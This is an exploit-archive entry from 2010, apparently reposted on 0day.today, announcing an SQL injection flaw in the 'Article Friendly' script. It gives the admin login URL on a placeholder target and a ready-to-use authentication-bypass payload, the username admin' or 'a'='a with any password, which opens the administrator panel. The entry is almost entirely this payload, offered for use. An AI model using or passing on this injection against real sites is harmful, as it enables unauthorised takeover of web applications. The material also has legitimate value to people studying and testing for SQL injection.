id: 11011
date: 02/22/2010
title: Article Friendly SQL Injection Vulnerability
author: SkuLL-HacKeR
cves: 

============================================
Article Friendly SQL Injection Vulnerability
============================================

###########################################################################
 
===[ #-/Expl0it Code\-# : ]===
 
# SQL Injection Vulnerability :
 
#-/ Link Admin: www.Target.com/[ScriptarticleLoser]/admin/
 
#-/ 0r : www.Target.com[Script-article-Loser]/admin/index.php?filename=adminlogin
 
#-/Username : admin' or 'a'='a
 
#-/Password : adminKas0l
 
###########################################################################



#  0day.today [2023-03-25]  #